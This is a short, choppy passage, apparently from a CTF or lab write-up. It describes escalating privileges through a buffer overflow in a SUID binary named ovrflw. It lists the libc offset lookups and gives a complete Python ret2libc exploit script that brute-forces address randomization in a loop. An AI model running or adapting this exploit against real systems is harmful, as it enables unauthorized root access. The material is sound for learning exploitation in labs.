I wanted to check version:
I run command to find a files with SUID perm:
As the name says “overflow”, probably I will have to find buffer overflow in this binary.
I need to find exact location of specific registers
Previously I noticed that there was a hint in registers:
112 for argument and 4 for EIP
On the remote host, I will be collecting data for script
Used as variable: libc_base_addr
Used as: system_off
Used as: exit_off
Used as: arg_off
Script code:
Code:
from subprocess import call
import struct
#ldd <binary_name> | grep libc.so.6
libc_base_addr = 0xb75b2000
# change location of libc.so.6 to the correct one - based on previous command
#readelf -s readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
system_off = 0x00040310
#readelf -s readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
exit_off = 0x00033290
#strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep bin/sh
arg_off = 0x000162bac
system_addr = struct.pack("<I",libc_base_addr+system_off)
exit_addr = struct.pack("<I",libc_base_addr+exit_off)
arg_addr = struct.pack("<I",libc_base_addr+arg_off)
buf = "A" * 112
buf += system_addr
buf += exit_addr
buf += arg_addr
i = 0
while (i<512):
print "Try %s" %i
i += 1
ret = call(["/usr/local/bin/ovrflw", buf])
I have successfully escalated privileges 🙂